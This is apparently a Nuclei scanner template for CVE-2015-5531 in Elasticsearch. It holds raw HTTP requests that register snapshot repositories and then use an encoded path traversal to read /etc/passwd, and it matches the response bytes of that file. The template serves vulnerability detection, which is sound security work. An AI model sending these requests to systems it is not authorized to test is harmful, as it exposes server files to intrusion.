nuclei-templates/cves/2015/CVE-2015-5531.yaml

53 lines
1.4 KiB
YAML

id: CVE-2015-5531
info:
name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
author: princechaddha
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
- https://nvd.nist.gov/vuln/detail/CVE-2015-5531
tags: cve,cve2015,elasticsearch
requests:
- raw:
- |
PUT /_snapshot/test HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}
- |
PUT /_snapshot/test2 HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}
- |
GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ElasticsearchParseException'
- 'Failed to derive xcontent from'
- '114, 111, 111, 116, 58'
condition: and
- type: status
status:
- 400